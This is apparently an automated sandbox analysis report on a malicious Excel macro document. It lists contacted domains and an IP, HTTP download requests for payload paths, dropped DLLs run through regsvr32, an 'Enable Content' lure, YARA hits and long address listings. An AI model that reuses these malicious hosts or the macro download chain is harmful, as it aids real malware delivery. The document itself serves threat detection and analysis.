                      Source: regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/i
                      Source: regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: microlent.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                      Source: global trafficHTTP traffic detected: GET /admin/3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: microlent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /yarisma/cgi-bin/aIuI4Ukdtl730sP1F/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kuluckaci.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Achievements/r4psv/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mcapublicschool.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 103.195.4.8:443 -> 192.168.2.22:49173 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1248680431.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.930405356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.919412326.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1249191933.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1248874495.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.914158918.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.930201138.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1248687990.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1249180337.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
                      Source: Document image extraction number: 0Screenshot OCR: Enable Editing and click Enable Content.
                      Source: Document image extraction number: 0Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing and click Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content.
                      Source: Scan 2022.20.05_0910.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: Scan 2022.20.05_0910.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllJump to dropped file
                      Source: Scan 2022.20.05_0910.xlsInitial sample: EXEC
                      Source: Scan 2022.20.05_0910.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\PlMfP\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_001D00003_2_001D0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C743_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE83_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800201183_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C3_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C3_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196283_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A4C3_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B7B23_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800094083_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C143_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064143_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C3_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8343_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C3_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800214443_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800120443_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160543_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C3_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018703_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F8783_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800144843_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154943_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC983_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C3_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A43_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A83_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC3_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B03_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB43_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B43_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C03_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C03_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C83_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D43_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D83_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F03_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125003_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800241043_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C3_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D103_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A5243_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D283_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E1303_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800291343_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800081343_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800221403_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800069543_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F5543_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B5643_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121683_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135683_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800245703_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800191783_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800251803_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800019803_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215883_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A9883_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181903_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800139943_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800289983_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A03_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A63_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA83_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC3_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B43_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B83_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B83_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC3_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C03_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C83_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC3_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D43_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D83_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E03_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC3_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800236243_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800186283_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C3_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176383_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C3_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E403_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A643_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800152643_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C3_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076783_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C3_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126803_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E883_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C3_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800222903_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A903_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C3_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA03_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC3_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB43_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC3_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C03_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC83_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC3_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC3_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC3_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F43_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF43_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF43_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC3_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063083_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C3_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B183_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F243_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B243_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F3283_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217383_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF383_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283483_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C3_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F503_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B3503_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A7583_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C3_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243703_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083703_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157743_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800123783_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B983_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C3_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA03_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A43_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC3_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B03_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB83_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC3_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC03_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC3_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC3_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001300004_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C8194_2_000000018000C819
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800196284_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C4_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C4_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800128644_2_0000000180012864
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C744_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B04_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800090B44_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C04_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C04_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800241044_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B244_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A7584_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800245704_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C4_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A44_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC4_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800094084_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C144_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064144_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800236244_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800186284_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C4_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C4_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B8344_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800176384_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C4_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004E3C4_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020E404_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800214444_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800120444_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160544_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015A644_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800152644_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A26C4_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800018704_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F8784_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076784_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001667C4_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126804_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800144844_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001E884_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000968C4_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800222904_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A904_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154944_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC984_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000529C4_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008C9C4_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020AA04_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800078A44_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F0A84_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022AAC4_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E4AC4_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800048B04_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ACB44_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007EB44_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800162BC4_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800270C04_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800280C84_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001AEC84_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800050D44_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800234D84_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F6DC4_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800026DC4_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002ADC4_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002ACE84_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800150F04_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E2F44_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016AF44_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DEF44_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DEFC4_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800125004_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800063084_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001370C4_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C4_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D104_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800201184_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B184_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A5244_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F244_2_0000000180015F24
